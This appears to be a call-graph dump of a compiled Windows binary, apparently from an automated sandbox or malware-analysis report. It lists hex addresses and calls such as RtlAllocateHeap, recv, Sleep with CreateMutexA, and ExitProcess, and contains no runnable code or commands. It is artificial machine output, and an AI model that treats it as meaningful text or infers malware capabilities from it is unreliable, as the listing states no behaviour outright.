10762->10683 10763->10683 10764 be7f20 10765 be9270 RtlAllocateHeap 10764->10765 10778 be7e91 __cftof 10765->10778 10766 be7e01 10766->10683 10767 be7f1b 10772 bd2480 RtlAllocateHeap 10767->10772 10768->10764 10768->10766 10768->10767 10770 be7ea7 10768->10770 10771 be7e80 10768->10771 10769 c06c6a RtlAllocateHeap 10777 be7f2a __cftof 10769->10777 10775 bed3e2 RtlAllocateHeap 10770->10775 10770->10778 10771->10767 10773 be7e8b 10771->10773 10772->10764 10774 bed3e2 RtlAllocateHeap 10773->10774 10774->10778 10775->10778 10776 be7f61 shared_ptr 10776->10683 10777->10776 10779 c06c6a RtlAllocateHeap 10777->10779 10778->10769 10780 be7f02 shared_ptr 10778->10780 10781 be7f7c 10779->10781 10780->10683 10785 beb5d6 10782->10785 10784 bd2472 10786 beb5f1 Concurrency::cancel_current_task 10785->10786 10787 c08bec __cftof 4 API calls 10786->10787 10789 beb658 __cftof std::invalid_argument::invalid_argument 10786->10789 10788 beb69f 10787->10788 10789->10784 11798 be8680 11799 be86e0 11798->11799 11799->11799 11807 be7760 11799->11807 11801 be86f9 11802 be8f40 RtlAllocateHeap 11801->11802 11803 be8714 11801->11803 11802->11803 11803->11803 11804 be8f40 RtlAllocateHeap 11803->11804 11806 be8769 11803->11806 11805 be87b1 11804->11805 11808 be7864 shared_ptr __cftof 11807->11808 11809 be777b 11807->11809 11808->11801 11809->11808 11810 be78f1 11809->11810 11814 be77ea 11809->11814 11815 be7811 11809->11815 11820 be77fb __cftof 11809->11820 11811 be9270 RtlAllocateHeap 11810->11811 11812 be78f6 11811->11812 11813 bd2480 RtlAllocateHeap 11812->11813 11816 be78fb 11813->11816 11814->11812 11817 bed3e2 RtlAllocateHeap 11814->11817 11818 bed3e2 RtlAllocateHeap 11815->11818 11815->11820 11817->11820 11818->11820 11819 c06c6a RtlAllocateHeap 11819->11810 11820->11808 11820->11819 11821 bda682 11823 bda68a shared_ptr 11821->11823 11822 bda949 11824 bda94e 11822->11824 11825 c06c6a RtlAllocateHeap 11822->11825 11823->11822 11826 bda75d shared_ptr 11823->11826 11827 bda953 Sleep CreateMutexA 11824->11827 11828 c06c6a RtlAllocateHeap 11824->11828 11825->11824 11829 be80c0 RtlAllocateHeap 11826->11829 11831 bda98e 11827->11831 11828->11827 11830 bda903 11829->11830 11836 bd6ae9 11839 bd6b01 11836->11839 11837 be80c0 RtlAllocateHeap 11838 bd6bac 11837->11838 11840 be9280 RtlAllocateHeap 11838->11840 11839->11837 11841 bd6bbd shared_ptr 11839->11841 11840->11841 11842 be80c0 RtlAllocateHeap 11841->11842 11843 bd6ce3 shared_ptr std::invalid_argument::invalid_argument 11842->11843 11864 bd9adc 11868 bd9aea shared_ptr 11864->11868 11865 bda917 11866 bda953 Sleep CreateMutexA 11865->11866 11867 c06c6a RtlAllocateHeap 11865->11867 11870 bda98e 11866->11870 11867->11866 11868->11865 11869 bd9b4b shared_ptr 11868->11869 11871 bd9b59 11869->11871 11872 bd9b65 11869->11872 11875 be80c0 RtlAllocateHeap 11871->11875 11873 be7a00 RtlAllocateHeap 11872->11873 11874 bd9b74 11873->11874 11876 bd5c10 4 API calls 11874->11876 11877 bda903 11875->11877 11878 bd9b7c 11876->11878 11879 bd8b30 4 API calls 11878->11879 11880 bd9b8d 11879->11880 11881 be8220 RtlAllocateHeap 11880->11881 11882 bd9b9c 11881->11882 11883 be7a00 RtlAllocateHeap 11882->11883 11884 bd9ca9 11883->11884 11885 bd5c10 4 API calls 11884->11885 11886 bd9cb1 11885->11886 11887 bd8b30 4 API calls 11886->11887 11888 bd9cc2 11887->11888 11889 be8220 RtlAllocateHeap 11888->11889 11890 bd9cd1 11889->11890 10838 bed0c7 10839 bed0d6 10838->10839 10840 bed17f 10839->10840 10841 bed17b RtlWakeAllConditionVariable 10839->10841 10847 bd20c0 10848 bec68b __Mtx_init_in_situ 2 API calls 10847->10848 10849 bd20cc 10848->10849 10850 bed64e RtlAllocateHeap 10849->10850 10851 bd20d6 10850->10851 10857 bde0c0 recv 10858 bde122 recv 10857->10858 10859 bde157 recv 10858->10859 10860 bde191 10859->10860 10861 bde2b3 std::invalid_argument::invalid_argument 10860->10861 10866 bec6ac 10860->10866 10873 bec452 10866->10873 10868 bde2ee 10869 bec26a 10868->10869 10870 bec292 10869->10870 10872 bec274 10869->10872 10870->10870 10872->10870 10890 bec297 10872->10890 10874 bec47a std::invalid_argument::invalid_argument 10873->10874 10875 bec4a8 10873->10875 10874->10868 10875->10874 10879 becf6b 10875->10879 10877 bec4fd __Xtime_diff_to_millis2 10877->10874 10878 becf6b _xtime_get GetSystemTimePreciseAsFileTime 10877->10878 10878->10877 10880 becf87 __aulldvrm 10879->10880 10881 becf7a 10879->10881 10880->10877 10881->10880 10883 becf44 10881->10883 10886 becbea 10883->10886 10887 becbfb GetSystemTimePreciseAsFileTime 10886->10887 10888 becc07 10886->10888 10887->10888 10888->10880 10895 bd2ae0 10890->10895 10894 bec2bf Concurrency::cancel_current_task 10896 bebedf InitOnceExecuteOnce 10895->10896 10898 bd2af4 __cftof 10896->10898 10897 bd2aff 10903 bec1ff 10897->10903 10898->10897 10899 c0a671 __cftof 4 API calls 10898->10899 10902 c06ccc 10899->10902 10900 c08bec __cftof 4 API calls 10901 c06cf6 10900->10901 10902->10900 10904 bec20b __EH_prolog3_GS 10903->10904 10905 be80c0 RtlAllocateHeap 10904->10905 10906 bec23d 10905->10906 10911 bd26b0 10906->10911 10908 bec252 10928 be7970 10908->10928 10910 bec25a 10910->10894 10912 be7a00 RtlAllocateHeap 10911->10912 10913 bd2702 10912->10913 10914 bd2725 10913->10914 10933 be8f40 10913->10933 10916 be8f40 RtlAllocateHeap 10914->10916 10917 bd278e 10914->10917 10916->10917 10918 bd27ed shared_ptr 10917->10918 10920 bd28b8 10917->10920 10919 c038af ___std_exception_copy RtlAllocateHeap 10918->10919 10923 bd284b 10919->10923 10922 c06c6a RtlAllocateHeap 10920->10922 10921 bd287a shared_ptr std::invalid_argument::invalid_argument 10921->10908 10922->10923 10923->10921 10924 c06c6a RtlAllocateHeap 10923->10924 10925 bd28c2 10924->10925 10954 c03912 10925->10954 10927 bd28e5 shared_ptr 10927->10908 10929 be797b 10928->10929 10930 be7996 shared_ptr 10928->10930 10929->10930 10931 c06c6a RtlAllocateHeap 10929->10931 10930->10910 10932 be79ba 10931->10932 10934 be908e 10933->10934 10935 be8f6b 10933->10935 10936 be9270 RtlAllocateHeap 10934->10936 10939 be8fdc 10935->10939 10940 be8fb2 10935->10940 10937 be9093 10936->10937 10938 bd2480 RtlAllocateHeap 10937->10938 10949 be8fc3 __cftof 10938->10949 10944 bed3e2 RtlAllocateHeap 10939->10944 10939->10949 10940->10937 10941 be8fbd 10940->10941 10943 bed3e2 RtlAllocateHeap 10941->10943 10942 c06c6a RtlAllocateHeap 10945 be909d 10942->10945 10943->10949 10944->10949 10946 be90b8 10945->10946 10950 be90be 10945->10950 10951 bd2480 Concurrency::cancel_current_task 10945->10951 10947 bed3e2 RtlAllocateHeap 10946->10947 10947->10950 10948 be904c shared_ptr __cftof 10948->10914 10949->10942 10949->10948 10950->10914 10952 c038af ___std_exception_copy RtlAllocateHeap 10951->10952 10953 bd24c3 10952->10953 10953->10914 10955 c03926 10954->10955 10956 c0391f 10954->10956 10955->10927 10957 c08ba3 ___std_exception_destroy RtlAllocateHeap 10956->10957 10957->10955 11891 bd2ec0 11892 bd2f7e GetCurrentThreadId 11891->11892 11893 bd2f06 11891->11893 11896 bd2f94 11892->11896 11913 bd2fef 11892->11913 11894 bec6ac GetSystemTimePreciseAsFileTime 11893->11894 11895 bd2f12 11894->11895 11897 bd2f1d 11895->11897 11898 bd301e 11895->11898 11901 bec6ac GetSystemTimePreciseAsFileTime 11896->11901 11896->11913 11902 bed3e2 RtlAllocateHeap 11897->11902 11905 bd2f30 __Mtx_unlock 11897->11905 11899 bec26a 5 API calls 11898->11899 11900 bd3024 11899->11900 11903 bec26a 5 API calls 11900->11903 11904 bd2fb9 11901->11904 11902->11905 11903->11904 11907 bec26a 5 API calls 11904->11907 11908 bd2fc0 __Mtx_unlock 11904->11908 11905->11900 11906 bd2f6f 11905->11906 11906->11892 11906->11913 11907->11908 11909 bec26a 5 API calls 11908->11909 11910 bd2fd8 __Cnd_broadcast 11908->11910 11909->11910 11911 bec26a 5 API calls 11910->11911 11910->11913 11912 bd303c 11911->11912 11914 bec6ac GetSystemTimePreciseAsFileTime 11912->11914 11922 bd3080 shared_ptr __Mtx_unlock 11914->11922 11915 bd31c5 11916 bec26a 5 API calls 11915->11916 11917 bd31cb 11916->11917 11918 bec26a 5 API calls 11917->11918 11919 bd31d1 11918->11919 11920 bec26a 5 API calls 11919->11920 11928 bd3193 __Mtx_unlock 11920->11928 11921 bd31a7 std::invalid_argument::invalid_argument 11922->11915 11922->11917 11922->11921 11924 bd3132 GetCurrentThreadId 11922->11924 11923 bec26a 5 API calls 11925 bd31dd 11923->11925 11924->11921 11926 bd313b 11924->11926 11926->11921 11927 bec6ac GetSystemTimePreciseAsFileTime 11926->11927 11929 bd315f 11927->11929 11928->11921 11928->11923 11929->11915 11929->11919 11929->11928 11930 bebd4c GetSystemTimePreciseAsFileTime 11929->11930 11930->11929 11951 c06a44 11952 c06a52 11951->11952 11953 c06a5c 11951->11953 11964 c0b655 11952->11964 11969 c0698d 11953->11969 11956 c06a59 11957 c06a76 11972 c068ed 11957->11972 11960 c06a8a 11962 c06aa8 11960->11962 11963 c0adf5 ___free_lconv_mon RtlAllocateHeap 11960->11963 11961 c0b655 RtlAllocateHeap 11961->11960 11963->11962 11965 c0b662 11964->11965 11966 c0b679 11965->11966 11975 c075c0 11965->11975 11966->11956 11970 c0690a __cftof 4 API calls 11969->11970 11971 c0699f 11970->11971 11971->11957 11983 c0683b 11972->11983 11980 c075e3 11975->11980 11977 c075cb __dosmaperr 11978 c075f6 __dosmaperr RtlAllocateHeap 11977->11978 11979 c075de 11978->11979 11979->11956 11981 c0a7c8 __dosmaperr RtlAllocateHeap 11980->11981 11982 c075e8 11981->11982 11982->11977 11984 c06863 11983->11984 11985 c06849 11983->11985 11987 c0686a 11984->11987 11989 c06889 __cftof 11984->11989 11996 c069cc 11985->11996 11993 c06853 11987->11993 12000 c069e6 11987->12000 11990 c069e6 RtlAllocateHeap 11989->11990 11992 c0689f __cftof 11989->11992 11990->11992 11991 c075c0 __dosmaperr RtlAllocateHeap 11994 c068ab 11991->11994 11992->11991 11992->11993 11993->11960 11993->11961 11995 c075f6 __dosmaperr RtlAllocateHeap 11994->11995 11995->11993 11997 c069df 11996->11997 11998 c069d7 11996->11998 11997->11993 11999 c0adf5 ___free_lconv_mon RtlAllocateHeap 11998->11999 11999->11997 12001 c069cc RtlAllocateHeap 12000->12001 12002 c069f4 12001->12002 12005 c06a25 12002->12005 12006 c0b04b __cftof RtlAllocateHeap 12005->12006 12007 c06a05 12006->12007 12007->11993 10976 bd1020 10977 be80c0 RtlAllocateHeap 10976->10977 10978 bd1031 10977->10978 10979 bed64e RtlAllocateHeap 10978->10979 10980 bd103b 10979->10980 10994 bda418 10995 bda420 shared_ptr 10994->10995 10996 bda93f 10995->10996 10997 bda4f3 shared_ptr 10995->10997 10998 c06c6a RtlAllocateHeap 10996->10998 11000 be80c0 RtlAllocateHeap 10997->11000 10999 bda944 10998->10999 11001 c06c6a RtlAllocateHeap 10999->11001 11003 bda903 11000->11003 11002 bda949 11001->11002 11004 bda94e 11002->11004 11005 c06c6a RtlAllocateHeap 11002->11005 11006 bda953 Sleep CreateMutexA 11004->11006 11007 c06c6a RtlAllocateHeap 11004->11007 11005->11004 11008 bda98e 11006->11008 11007->11006 11032 bd1000 11033 bed64e RtlAllocateHeap 11032->11033 11034 bd100a 11033->11034 12046 bd2e00 12047 bd2e28 12046->12047 12048 bec68b __Mtx_init_in_situ 2 API calls 12047->12048 12049 bd2e33 12048->12049 11035 bda079 11036 bda081 shared_ptr 11035->11036 11037 bda930 11036->11037 11038 bda154 shared_ptr 11036->11038 11039 c06c6a RtlAllocateHeap 11037->11039 11041 be80c0 RtlAllocateHeap 11038->11041 11040 bda953 Sleep CreateMutexA 11039->11040 11043 bda98e 11040->11043 11042 bda903 11041->11042 11044 bdcc79 11045 bdcc84 shared_ptr 11044->11045 11046 bdce09 shared_ptr std::invalid_argument::invalid_argument 11045->11046 11047 bdce31 11045->11047 11049 be7a00 RtlAllocateHeap 11045->11049 11052 bd5c10 4 API calls 11045->11052 11059 be8f40 RtlAllocateHeap 11045->11059 11060 bd9030 11045->11060 11073 be8220 11045->11073 11048 c06c6a RtlAllocateHeap 11047->11048 11050 bdce36 11048->11050 11049->11045 11051 be7a00 RtlAllocateHeap 11050->11051 11053 bdce92 11051->11053 11052->11045 11055 bd5c10 4 API calls 11053->11055 11056 bdce9d 11055->11056 11081 bdca70 11056->11081 11059->11045 11061 bd9080 11060->11061 11062 be7a00 RtlAllocateHeap 11061->11062 11063 bd908f 11062->11063 11064 bd5c10 4 API calls 11063->11064 11065 bd909a 11064->11065 11066 be80c0 RtlAllocateHeap 11065->11066 11067 bd90ec 11066->11067 11068 be8220 RtlAllocateHeap 11067->11068 11070 bd90fe shared_ptr 11068->11070 11069 bd917e shared_ptr std::invalid_argument::invalid_argument 11069->11045 11070->11069 11071 c06c6a RtlAllocateHeap 11070->11071 11072 bd91aa 11071->11072 11074 be8248 11073->11074 11075 be8292 11073->11075 11074->11075 11076 be8251 11074->11076 11078 be82a1 11075->11078 11080 be8f40 RtlAllocateHeap 11075->11080 11097 be9280 11076->11097 11078->11045 11079 be825a 11079->11045 11080->11078 11096 bdcadd 11081->11096 11082 be7a00 RtlAllocateHeap 11082->11096 11083 bdce09 shared_ptr std::invalid_argument::invalid_argument 11084 bdce31 11086 c06c6a RtlAllocateHeap 11084->11086 11085 bd5c10 4 API calls 11085->11096 11088 bdce36 11086->11088 11087 bd9030 4 API calls 11087->11096 11089 be7a00 RtlAllocateHeap 11088->11089 11091 bdce92 11089->11091 11090 be8220 RtlAllocateHeap 11090->11096 11092 bd5c10 4 API calls 11091->11092 11093 bdce9d 11092->11093 11094 bdca70 4 API calls 11093->11094 11095 be8f40 RtlAllocateHeap 11095->11096 11096->11082 11096->11083 11096->11084 11096->11085 11096->11087 11096->11090 11096->11095 11098 be9294 11097->11098 11101 be92a5 __cftof 11098->11101 11102 be94e0 11098->11102 11100 be932b 11100->11079 11101->11079 11103 be950b 11102->11103 11104 be9619 11102->11104 11108 be9579 11103->11108 11109 be9552 11103->11109 11105 be9270 RtlAllocateHeap 11104->11105 11106 be961e 11105->11106 11107 bd2480 RtlAllocateHeap 11106->11107 11115 be9563 __cftof 11107->11115 11113 bed3e2 RtlAllocateHeap 11108->11113 11108->11115 11109->11106 11110 be955d 11109->11110 11112 bed3e2 RtlAllocateHeap 11110->11112 11111 c06c6a RtlAllocateHeap 11114 be9628 shared_ptr 11111->11114 11112->11115 11113->11115 11114->11100 11115->11111 11116 be95e1 shared_ptr __cftof 11115->11116 11116->11100 12055 bd4276 12056 bd2410 5 API calls 12055->12056 12057 bd427f 12056->12057 12058 bd3ce0 RtlAllocateHeap 12057->12058 12059 bd428f 12058->12059 9703 c06629 9706 c064c7 9703->9706 9707 c064d5 __cftof 9706->9707 9708 c06520 9707->9708 9711 c0652b 9707->9711 9710 c0652a 9717 c0a302 GetPEB 9711->9717 9713 c06535 9714 c0654a __cftof 9713->9714 9715 c0653a GetPEB 9713->9715 9716 c06562 ExitProcess 9714->9716 9715->9714 9718 c0a31c __cftof 9717->9718 9718->9713 9719 bda856 9720 bda870 9719->9720 9721 bda892 shared_ptr 9719->9721 9720->9721 9722 bda94e 9720->9722 9728 be80c0 9721->9728 9724 bda953 Sleep CreateMutexA 9722->9724 9743 c06c6a 9722->9743 9727 bda98e 9724->9727 9726 bda903 9730 be8104 9728->9730 9732 be80de 9728->9732 9729 be81ee 9751 be9270 9729->9751 9730->9729 9734 be817d 9730->9734 9735 be8158 9730->9735 9732->9726 9733 be81f3 9754 bd2480 9733->9754 9739 bed3e2 RtlAllocateHeap 9734->9739 9741 be8169 __cftof 9734->9741 9735->9733 9746 bed3e2 9735->9746 9739->9741 9740 c06c6a RtlAllocateHeap 9740->9729 9741->9740 9742 be81d0 shared_ptr 9741->9742 9742->9726 9744 c06bf6 __cftof RtlAllocateHeap 9743->9744 9745 c06c79 __cftof 9744->9745 9747 bd2480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9746->9747 9750 bed401 Concurrency::cancel_current_task 9747->9750 9758 c038af 9747->9758 9750->9741 9847 bec1b9 9751->9847 9755 bd248e Concurrency::cancel_current_task 9754->9755 9756 c038af ___std_exception_copy RtlAllocateHeap 9755->9756 9757 bd24c3 9756->9757 9759 bd24c3 9758->9759 9760 c038bc ___std_exception_copy 9758->9760 9759->9741 9760->9759 9763 c038e9 9760->9763 9764 c0a1f1 9760->9764 9773 c08ba3 9763->9773 9765 c0a1fe 9764->9765 9766 c0a20c 9764->9766 9765->9766 9768 c0a223 9765->9768 9776 c075f6 9766->9776 9770 c0a21e 9768->9770 9771 c075f6 __dosmaperr RtlAllocateHeap 9768->9771 9770->9763 9772 c0a214 9771->9772 9779 c06c5a 9772->9779 9774 c0adf5 ___free_lconv_mon RtlAllocateHeap 9773->9774 9775 c08bbb 9774->9775 9775->9759 9782 c0a7c8 9776->9782 9841 c06bf6 9779->9841 9781 c06c66 9781->9770 9783 c0a7d2 __dosmaperr 9782->9783 9785 c075fb 9783->9785 9793 c0d82f 9783->9793 9785->9772 9786 c0a813 __dosmaperr 9787 c0a81b __dosmaperr 9786->9787 9788 c0a853 9786->9788 9797 c0adf5 9787->9797 9801 c0a49f 9788->9801 9792 c0adf5 ___free_lconv_mon RtlAllocateHeap 9792->9785 9796 c0d83c __dosmaperr 9793->9796 9794 c0d867 RtlAllocateHeap 9795 c0d87a __dosmaperr 9794->9795 9794->9796 9795->9786 9796->9794 9796->9795 9798 c0ae00 9797->9798 9800 c0ae1b __dosmaperr 9797->9800 9799 c075f6 __dosmaperr RtlAllocateHeap 9798->9799 9798->9800 9799->9800 9800->9785 9802 c0a50d __dosmaperr 9801->9802 9805 c0a445 9802->9805 9804 c0a536 9804->9792 9806 c0a451 __cftof 9805->9806 9809 c0a626 9806->9809 9808 c0a473 __dosmaperr 9808->9804 9810 c0a65c __dosmaperr 9809->9810 9811 c0a635 __dosmaperr 9809->9811 9810->9808 9811->9810 9813 c0f35f 9811->9813 9814 c0f375 9813->9814 9816 c0f3df 9813->9816 9814->9816 9818 c0f3a8 9814->9818 9823 c0adf5 ___free_lconv_mon RtlAllocateHeap 9814->9823 9815 c0f4d0 __dosmaperr RtlAllocateHeap 9839 c0f43b 9815->9839 9817 c0adf5 ___free_lconv_mon RtlAllocateHeap 9816->9817 9840 c0f42d 9816->9840 9819 c0f401 9817->9819 9820 c0f3ca 9818->9820 9828 c0adf5 ___free_lconv_mon RtlAllocateHeap 9818->9828 9821 c0adf5 ___free_lconv_mon RtlAllocateHeap 9819->9821 9822 c0adf5 ___free_lconv_mon RtlAllocateHeap 9820->9822 9824 c0f414 9821->9824 9825 c0f3d4 9822->9825 9827 c0f39d 9823->9827 9829 c0adf5 ___free_lconv_mon RtlAllocateHeap 9824->9829 9830 c0adf5 ___free_lconv_mon RtlAllocateHeap 9825->9830 9826 c0f49b 9831 c0adf5 ___free_lconv_mon RtlAllocateHeap 9826->9831 9832 c0ef3c ___free_lconv_mon RtlAllocateHeap 9827->9832 9834 c0f3bf 9828->9834 9835 c0f422 9829->9835 9830->9816 9838 c0f4a1 9831->9838 9832->9818 9833 c0adf5 RtlAllocateHeap ___free_lconv_mon 9833->9839 9836 c0f03a __dosmaperr RtlAllocateHeap 9834->9836 9837 c0adf5 ___free_lconv_mon RtlAllocateHeap 9835->9837 9836->9820 9837->9840 9838->9810 9839->9826 9839->9833 9840->9815 9842 c0a7c8 __dosmaperr RtlAllocateHeap 9841->9842 9844 c06c01 __cftof 9842->9844 9843 c06c0f 9843->9781 9844->9843 9845 c06bf6 __cftof RtlAllocateHeap 9844->9845 9846 c06c66 9845->9846 9846->9781 9850 bec123 9847->9850 9849 bec1ca Concurrency::cancel_current_task 9853 bd22e0 9850->9853 9852 bec135 9852->9849 9854 c038af ___std_exception_copy RtlAllocateHeap 9853->9854 9855 bd2317 std::invalid_argument::invalid_argument 9854->9855 9855->9852 12084 bebe50 12087 bebd8b 12084->12087 12086 bebe66 Concurrency::cancel_current_task std::_Throw_future_error 12088 bd22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 12087->12088 12089 bebd9f 12088->12089 12089->12086 9856 c0d82f 9859 c0d83c __dosmaperr 9856->9859 9857 c0d867 RtlAllocateHeap 9858 c0d87a __dosmaperr 9857->9858 9857->9859 9859->9857 9859->9858 11147 bd3c47 11148 bd3c51 11147->11148 11151 bd3c5f 11148->11151 11154 bd32d0 11148->11154 11149 bd3c68 11151->11149 11152 bd3810 4 API calls 11151->11152 11153 bd3cdb 11152->11153 11155 bec6ac GetSystemTimePreciseAsFileTime 11154->11155 11163 bd3314 11155->11163 11156 bd336b 11157 bec26a 5 API calls 11156->11157 11158 bd333c __Mtx_unlock 11157->11158 11160 bec26a 5 API calls 11158->11160 11161 bd3350 std::invalid_argument::invalid_argument 11158->11161 11162 bd3377 11160->11162 11161->11151 11164 bec6ac GetSystemTimePreciseAsFileTime 11162->11164 11163->11156 11163->11158 11173 bebd4c 11163->11173 11165 bd33af 11164->11165 11166 bec26a 5 API calls 11165->11166 11167 bd33b6 __Cnd_broadcast 11165->11167 11166->11167 11168 bec26a 5 API calls 11167->11168 11169 bd33d7 __Mtx_unlock 11167->11169 11168->11169 11170 bec26a 5 API calls 11169->11170 11171 bd33eb 11169->11171 11172 bd340e 11170->11172 11171->11151 11172->11151 11176 bebb72 11173->11176 11175 bebd5c 11175->11163 11177 bebb9c 11176->11177 11178 becf6b _xtime_get GetSystemTimePreciseAsFileTime 11177->11178 11179 bebba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 11177->11179 11180 bebbcf __Xtime_diff_to_millis2 11178->11180 11179->11175 11180->11179 11181 becf6b _xtime_get GetSystemTimePreciseAsFileTime 11180->11181 11181->11179 11182 bd3440 11187 bd2b30 11182->11187 11184 bd344f Concurrency::cancel_current_task 11185 c038af ___std_exception_copy RtlAllocateHeap 11184->11185 11186 bd3483 11185->11186 11188 c038af ___std_exception_copy RtlAllocateHeap 11187->11188 11189 bd2b68 std::invalid_argument::invalid_argument 11188->11189 11189->11184 11195 bd3840 11196 bd38f6 11195->11196 11199 bd385f 11195->11199 11197 bd3920 11205 be91e0 11197->11205 11199->11196 11199->11197 11201 bd391b 11199->11201 11204 bd38cd shared_ptr 11199->11204 11200 be7d50 RtlAllocateHeap 11200->11196 11203 c06c6a RtlAllocateHeap 11201->11203 11202 bd3925 11203->11197 11204->11200 11206 bec1b9 RtlAllocateHeap 11205->11206 11207 be91ea 11206->11207 11207->11202 11226 bd6db5 11227 bd6dc2 11226->11227 11228 bd6dca 11227->11228 11229 bd6df5 11227->11229 11230 be80c0 RtlAllocateHeap 11228->11230 11231 be80c0 RtlAllocateHeap 11229->11231 11232 bd6deb shared_ptr 11230->11232 11231->11232 11233 bd6ec1 shared_ptr 11232->11233 11234 c06c6a RtlAllocateHeap 11232->11234 11235 bd6ee3 11234->11235 12110 bdb7b1 12112 bdb7be 12110->12112 12111 be7a00 RtlAllocateHeap 12113 bdb7f3 12111->12113 12112->12111 12114 be7a00 RtlAllocateHeap 12113->12114 12115 bdb80b 12114->12115 12116 be7a00 RtlAllocateHeap 12115->12116 12117 bdb823 12116->12117 12118 be7a00 RtlAllocateHeap 12117->12118 12119 bdb835 12118->12119 12120 bd9ba5 12121 bd9ba7 12120->12121 12122 be7a00 RtlAllocateHeap 12121->12122 12123 bd9ca9 12122->12123 12124 bd5c10 4 API calls 12123->12124 12125 bd9cb1 12124->12125 12126 bd8b30 4 API calls 12125->12126 12127 bd9cc2 12126->12127 12128 be8220 RtlAllocateHeap 12127->12128 12129 bd9cd1 12128->12129 12150 bd3f9f 12151 bd3fad 12150->12151 12155 bd3fc5 12150->12155 12152 bd2410 5 API calls 12151->12152 12153 bd3fb6 12152->12153 12154 bd3ce0 RtlAllocateHeap 12153->12154 12154->12155 12159 bd2b90 12160 bd2bce 12159->12160 12161 beb7fb TpReleaseWork 12160->12161 12162 bd2bdb shared_ptr std::invalid_argument::invalid_argument 12161->12162 11292 bd8980 11293 bd8aea 11292->11293 11300 bd89d8 shared_ptr 11292->11300 11294 be7a00 RtlAllocateHeap 11294->11300 11295 bd5c10 4 API calls 11295->11300 11296 bd8b20 11303 be8200 11296->11303 11297 be80c0 RtlAllocateHeap 11297->11300 11299 bd8b25 11301 c06c6a RtlAllocateHeap 11299->11301 11300->11293 11300->11294 11300->11295 11300->11296 11300->11297 11300->11299 11302 bd8b2a 11301->11302 11306 bec1d9 11303->11306 11305 be820a 11309 bec15d 11306->11309 11308 bec1ea Concurrency::cancel_current_task 11308->11305 11310 bd22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11309->11310 11311 bec16f 11310->11311 11311->11308 11312 bd55f0 11313 bd5610 11312->11313 11314 bd22c0 4 API calls 11313->11314 11315 bd5710 std::invalid_argument::invalid_argument 11313->11315 11314->11313 12183 bd43f0 12184 bebedf InitOnceExecuteOnce 12183->12184 12185 bd440a 12184->12185 12186 bd4411 12185->12186 12187 c06cbb 4 API calls 12185->12187 12188 bd4424 12187->12188 12209 bd3fe0 12210 bd4022 12209->12210 12211 bd408c 12210->12211 12212 bd40d2 12210->12212 12215 bd4035 std::invalid_argument::invalid_argument 12210->12215 12216 bd35e0 12211->12216 12213 bd3ee0 4 API calls 12212->12213 12213->12215 12217 bed3e2 RtlAllocateHeap 12216->12217 12218 bd3616 12217->12218 12222 bd364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 12218->12222 12223 bd2ce0 12218->12223 12220 bd369e 12221 bd2c00 4 API calls 12220->12221 12220->12222 12221->12222 12222->12215 12224 bd2d1d 12223->12224 12225 bebedf InitOnceExecuteOnce 12224->12225 12226 bd2d46 12225->12226 12227 bd2d51 std::invalid_argument::invalid_argument 12226->12227 12228 bd2d88 12226->12228 12232 bebef7 12226->12232 12227->12220 12230 bd2440 4 API calls 12228->12230 12231 bd2d9b 12230->12231 12231->12220 12233 bebf03 12232->12233 12241 bd2900 12233->12241 12235 bebf23 Concurrency::cancel_current_task 12236 bebf6a 12235->12236 12237 bebf73 12235->12237 12251 bebe7f 12236->12251 12238 bd2ae0 5 API calls 12237->12238 12240 bebf6f 12238->12240 12240->12228 12242 be80c0 RtlAllocateHeap 12241->12242 12243 bd294f 12242->12243 12244 bd26b0 RtlAllocateHeap 12243->12244 12246 bd2967 12244->12246 12245 bd298d shared_ptr 12245->12235 12246->12245 12247 c06c6a RtlAllocateHeap 12246->12247 12248 bd29b6 12247->12248 12249 c038af ___std_exception_copy RtlAllocateHeap 12248->12249 12250 bd29e4 12249->12250 12250->12235 12252 becc31 InitOnceExecuteOnce 12251->12252 12253 bebe97 12252->12253 12254 bebe9e 12253->12254 12255 c06cbb 4 API calls 12253->12255 12254->12240 12256 bebea7 12255->12256 12256->12240 11336 be85e0 11337 be85f6 11336->11337 11337->11337 11338 be8f40 RtlAllocateHeap 11337->11338 11339 be860b 11337->11339 11338->11339 11340 be8de0 11341 be8f2f 11340->11341 11342 be8e05 11340->11342 11343 be9270 RtlAllocateHeap 11341->11343 11345 be8e4c 11342->11345 11346 be8e76 11342->11346 11344 be8f34 11343->11344 11347 bd2480 RtlAllocateHeap 11344->11347 11345->11344 11348 be8e57 11345->11348 11351 bed3e2 RtlAllocateHeap 11346->11351 11353 be8e5d __cftof 11346->11353 11347->11353 11350 bed3e2 RtlAllocateHeap 11348->11350 11349 c06c6a RtlAllocateHeap 11352 be8f3e 11349->11352 11350->11353 11351->11353 11353->11349 11354 be8eed shared_ptr __cftof 11353->11354 12257 bd87d0 12258 bd88d3 12257->12258 12267 bd8819 shared_ptr 12257->12267 12259 be80c0 RtlAllocateHeap 12258->12259 12260 bd8923 12259->12260 12265 bd8949 shared_ptr 12260->12265 12266 c06c6a RtlAllocateHeap 12260->12266 12261 bd896c 12262 be8200 RtlAllocateHeap 12261->12262 12264 bd8971 12262->12264 12263 be80c0 RtlAllocateHeap 12263->12267 12266->12261 12267->12258 12267->12260 12267->12261 12267->12263 12268 c067b7 12269 c067c3 __cftof 12268->12269 12270 c067cd 12269->12270 12274 c067e2 12269->12274 12271 c075f6 __dosmaperr RtlAllocateHeap 12270->12271 12272 c067d2 12271->12272 12273 c06c5a __cftof RtlAllocateHeap 12272->12273 12276 c067dd 12273->12276 12274->12276 12277 c06740 12274->12277 12278 c06762 12277->12278 12279 c0674d 12277->12279 12285 c0675d 12278->12285 12293 c0a038 12278->12293 12280 c075f6 __dosmaperr RtlAllocateHeap 12279->12280 12281 c06752 12280->12281 12283 c06c5a __cftof RtlAllocateHeap 12281->12283 12283->12285 12285->12276 12289 c06785 12310 c0aebb 12289->12310 12292 c0adf5 ___free_lconv_mon RtlAllocateHeap 12292->12285 12294 c06777 12293->12294 12295 c0a050 12293->12295 12299 c0b00b 12294->12299 12295->12294 12296 c0afe4 RtlAllocateHeap 12295->12296 12297 c0a06e 12296->12297 12325 c10439 12297->12325 12300 c0b022 12299->12300 12301 c0677f 12299->12301 12300->12301 12302 c0adf5 ___free_lconv_mon RtlAllocateHeap 12300->12302 12303 c0afe4 12301->12303 12302->12301 12304 c0aff0 12303->12304 12305 c0b005 12303->12305 12306 c075f6 __dosmaperr RtlAllocateHeap 